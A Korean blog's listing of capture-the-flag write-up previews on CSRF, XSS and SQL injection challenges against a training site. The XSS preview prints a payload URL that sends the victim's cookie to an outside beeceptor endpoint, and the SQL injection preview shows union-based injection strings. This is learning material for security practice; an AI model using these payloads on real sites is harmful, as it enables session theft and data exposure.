본문 바로가기

WarGame19

csrf 문제 풀이 csrf_1 문제 (get 요청)게시판 내용 부분에 위의 payload 를 게시판 내용에 넣고 다시 읽을 때 는 위와 같이 회원 정보 수정에 성공했다는 알림이 뜬다. 관리자가 이러한 알림을 본다면 의심하게 된다. 그렇기에 안뜨게 하려면 위의 문제와 마찬가지로 을 사용한다. 다시 들어가보면 아무것도 뜨지 않고 실행되고 있음을 알 수 있다. 관리자가 중간에 알아채는 것 없이 접속했다.이후 norm_admin을 id로 1004(변경 이후)으로 로그인 하면 flag를 획득할 수 있다. csrf_3 문제(csrf 토큰)앞의 문제들과 같이 게시판 내용에 적힌 script가 그대로 실행되어 xss 공격이 가능하다.공격문을 넣기 전 mypage_update가 어떻게 이뤄지는 지 보기 위해 개발자 도구에서 network.. 2026. 1. 14.
ClientScript StealInfo 1번notice 글을 읽을 때 xss 공격이 실행되는 것을 확인한 후 주요 정보가 있는 마이페이지에 iframe으로 접근해서 innertext를 통해 마이페이지에 있는 글들이 출력되도록 한다. 위의 캡처본을 보면 게시판 내용 부분에서 마이페이지가 출력되는 것을 알 수 있다. beeceptor로 요청이 보내지도록 설정해둔 결과 위와 같은 결과가 나온다. -> This is a very secret Info 라는 글자가 그대로 출력된다. 관리자가 아니면 절대로 접근이 안되는 secret.php에 접근을 시도한다. 관리자 권한으로 접근해야하기에 관리자 접근 사이트에서 해당 사이트의 url을 접속하면 beeceptor에서 request/response 값을 볼 수 있다. StealInfo.. 2026. 1. 3.
xss write up 3 xss 5번 문제글을 수정할 때 등록할 때 모두 html entity로 바뀌는 것을 알 수 있다. 이렇게 저장되게 하는 js 코드를 보면 아래와 같이 replace를 통해 바뀌는 것을 알 수 있다. checkContent 함수와 onsubmit을 삭제한 뒤 다시 요청을 보내면 script가 실행되는 것을 알 수 있다. intercept를 통해 중간에 response의 코드를 변경한다. 앞에서 언급했던 삭제해야하는 부분을 response에서 삭제한 후 forward를 하면 아래와 같이 쿠키값이 나온다. 관리자 페이지에서 위의 url을 클릭하면 관리자의 세션 id가 beeceptor에 전달되도록 script에 쿠키값이 잘 전달되었음을 알 수 있다. 이제는 관리자 페이지에서 url을 보내면 flag값을 얻.. 2025. 12. 26.
xss writeup 2 xss 문제 3mypage에 user 파라미터에 norm' 을 작성한 결과 그대로 화면에 나타나는 것을 알 수 있다. url 에 쿠키값이 출력되도록 작성한 다음 결과를 보면 실제 그대로 화면에 나타나는 것을 알 수 있다.이를 이용해 beeceptor 라는 서버로 쿠키값을 보내는 공격을 시도할 것이다. 실제 관리자가 방문하는 사이트에 url을 넣은 다음 그것을 클릭하면 관리자의 쿠키값이 beeceptor 라는 공격자의 서버에서 출력된다. (flag값 획득) http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=%22/%3E%3Cscript%3Enew%20Image().src=%22https://entry.free.beeceptor.com?cookie=%22%2bd.. 2025. 12. 24.
xss writeup 1 xss 1번 문제 회원가입을 하고 로그인을 한 후 게시물 페이지에 들어가글의 제목과 내용에 이 값을 넣어서 변화를 관찰했다. 등록 후 목록을 보면 위와 같이 되어있다. 그러나 수정을 하려고 들어가보면 아래와 같이 제목 부분에 "> 이 부분이 사라져있음을 알 수 있다. 개발자 도구를 보면 html 엔티티(&gt)로 필터링 된 것을 알 수 있다.그러나 수정 페이지가 아닌 notice_read 페이지에서는 를 통해 쿠키 값을 탈취할 수 있다. 이제 실제로 이 쿠키값을 다른 서버에 보내기 위해 이것이 실행되는 지 볼 것이다. 공격 루트 : 관리자가 들어갈 url에 취약한 url을 넣어서 flag값을 얻는다. xss 2번 문제공지사항 검색 창에 처음에 로그인을 했던 user id norm 이 아닌 다른 것.. 2025. 12. 24.
sqli segfault writeup # sql injection 1 번 문제 풀이1번 goal = '비밀 데이터를 찾아라'admin%' # 위와 같이 적었을 때 위와 같은 결과가 나온다. 이것의 의미는 id like '%{}%' 로 작성되어 있을 가능성이 높다는 얘기이다. (union 7 step을 이용해서 접근해보면 될 거 같다는 생각이 든다.. 위에서 구문 구조를 파악했기 때문에 2번부터 진행한다)-> 2. 컬럼 개수 파악admin%' order by 5# 를 실행하니 column 5는 존재하지 않는다고 뜬다. 결국 4개의 컬럼이 있는 것이다. -> 3. 출력되는 컬럼 파악 admin%' union select 1,2,3,4 # 실행 결과 1,2,3,4 데이터가 모두 출력되는 것을 알 수 있다. -> 4. 데이터 베이스 이름 파악 ad.. 2025. 11. 26.

티스토리툴바